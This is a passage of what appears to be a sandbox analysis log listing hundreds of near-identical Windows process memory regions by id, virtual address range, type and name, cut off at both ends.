end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19874 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19875 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19876 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19877 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19878 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19879 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19880 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19881 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19882 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19883 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19884 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19915 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19916 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19917 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19918 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19919 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19920 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19921 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19922 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19923 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19924 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19925 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19926 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19927 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19928 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19929 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19930 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19931 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19932 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19933 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19934 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19935 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19936 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 19937 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 19938 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 19939 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 19940 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19941 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19942 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19943 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19949 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19950 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19951 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19952 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19953 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19954 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19955 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19956 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19957 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19958 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19959 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19960 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19961 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19962 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19963 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19964 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19965 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19966 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19967 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19968 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19969 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19970 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19971 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19972 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19973 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19974 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19975 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19976 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19977 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19978 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19979 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19980 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19981 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19982 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19983 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19989 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19990 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19991 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19992 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19993 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19994 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19995 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19996 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19997 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19998 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19999 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20072 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 20073 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 20074 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 20075 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 20076 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20077 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20078 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20079 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20080 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20081 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20082 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20083 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20084 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20085 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20086 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20087 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20088 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20089 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20090 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20091 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20092 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20093 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20094 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20095 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20096 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20097 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20098 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20099 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20100 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20101 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20102 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20103 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20104 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20105 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20106 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20107 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20108 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20114 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20115 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20116 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20117 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20118 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20119 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20120 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20121 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20122 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20123 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20124 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20125 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20126 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20127 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20128 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20129 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 20130 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 20131 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 20132 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 20133 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20134 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20135 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20136 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20137 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20153 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20154 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20155 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20156 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20157 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20158 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20159 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20160 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20161 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20162 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20163 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20164 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20165 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20166 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20167 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20168 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20169 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20170 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20171 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20172 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20173 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20174 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20175 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20176 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20177 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20178 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20179 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20180 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20181 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20182 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20183 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20184 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20205 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20206 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20207 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20208 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20209 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20210 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20211 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20212 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20213 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20214 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20215 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20216 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20217 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20330 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 20331 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 20332 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 20333 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 20334 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20335 start_va = 0x2a0000 end_va 